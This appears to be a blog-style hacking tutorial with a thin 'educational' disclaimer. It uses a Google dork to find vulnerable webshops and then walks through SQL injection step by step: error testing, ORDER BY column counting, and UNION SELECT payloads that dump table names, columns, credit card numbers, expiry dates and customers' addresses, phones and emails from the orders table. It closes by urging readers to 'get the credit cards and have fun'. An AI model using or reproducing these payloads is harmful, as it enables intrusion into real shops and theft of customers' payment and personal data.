~~~~~~~~~~~~~~~~~~~~~~~~~~~~
(This tutorial may be harmful to society & illegeal too , useit only for educational purpose)
[Level:Medium] [presrequisites :SQL injection]
1) we got to search google for webshops , I used this dork :
Code:
inurl:customer_ testimonials.ph p testimonial_id=
2)lets say we got this site [/url]
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7
3) we got to check if its vulnerable to SQLi , we add this
Code:
'
to url :
>>>
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7 '
if we get a error means website its vuln.
4) we have to check for column number we try with 10first
Code:
+order+by+10-
- :
>>>
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+or der+by+10 --
if we dont get a error means the website has more then 10columns , if we get a error means the website has less then 10 columns
5 )this time we get a error now we try from 1 to 9
Code:
+union+select+1 ,2,3,4,5,6,7,8, 9--
>>>
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1%2C 2%2C3%2C4%2C5%2 C6%2C7%2C8%2C9 --
now we found it the website has 9 columns
6) most of time we can get infos from table 3 and 6 , letssay now we can from 3 xD , now we can get database user , database name and database version in this way:
*- database user
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1%2C 2%2Cuser%28%29% 2C4%2C5%2C6%2C7 %2C8%2C9 --
*- database name
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1%2C 2%2Cdatabase%28 %29%2C4%2C5%2C6 %2C7%2C8%2C9 --
*- database version
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1%2C 2%2Cversion%28% 29%2C4%2C5%2C6% 2C7%2C8%2C9 --
7) we need the table names we add this to url :
Code:
+union+select+1 ,2,table_name,4 ,5,6,7,8,9+from +information_sc hema.tables--
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1%2C 2%2Ctable_name% 2C4%2C5%2C6%2C7 %2C8%2C9+from+i nformation_sche ma.tables --
[url= http:// illiweb.com/fa/ i/smiles/ icon_cool.gif ] now we need columns : we add this tourl :
Code:
+union+select+1 ,2,concat(table _name,char(58), column_name),4, 5,6,7,8,9+from+ information_sch ema.columns--
>>>
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1%2C 2%2Cconcat (table_name,cha r(58),column_na me),4,5,6,7,8,9 +from+informati on_schema.colum ns--
9) now all we got to do is view the orders and customers infos (there are the credit cards xD) : if we add this to url we will get credit card numbers , payment method , credit card type ......
Code:
+union+select+1 ,2,concat(payme nt_method,char( 58),cc_type,cha r(58),cc_number ,char(58),cc_ex pires),4,5,6,7, 8,9fromorders--
>>>
Code:
http:// www.JustExample. com/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1%2C 2%2Cconcat (payment_method ,char(58),cc_ty pe,char(58),cc_ number,char(58) ,cc_expires),4, 5,6,7,8,9+from+ orders--if we add this to url we will get many infos about costumers , address , phone number , e-mails , zip code , and the credit card infos all of them
Code:
+union+select+1 ,2,concat(order s_id,0x2F,cc_ty pe,0x2F,cc_owne r,0x2F,cc_numbe r,0x2F,cc_expir es,0x2F,custome rs_street_addre ss,0x2F,custome rs_suburb,0x2F, customers_city, 0x2F,customers_ postcode,0x2F,c ustomers_state, 0x2F,customers_ country,0x2F,cu stomers_telepho ne,0x2F,custome rs_email_addres s,0x2F,date_pur chased),4,5,6,7 ,8,9+from+order s+
>>>
Code:
http:// www.JustExample. com/
/ customer_testimo nials.php?&test imonial_id=7+un ion+select+1,2, concat(orders_i d,0x2F,cc_type, 0x2F,cc_owner,0 x2F,cc_number,0 x2F,cc_expires, 0x2F,customers_ street_address, 0x2F,customers_ suburb,0x2F,cus tomers_city,0x2 F,customers_pos tcode,0x2F,cust omers_state,0x2 F,customers_cou ntry,0x2F,custo mers_telephone, 0x2F,customers_ email_address,0 x2F,date_purcha sed),4,5,6,7,8, 9+from+orders+
now one step left
10 ) get the credit cards and have fun
Stay tuned for more ! Happy hacking !
No comments:
Post a Comment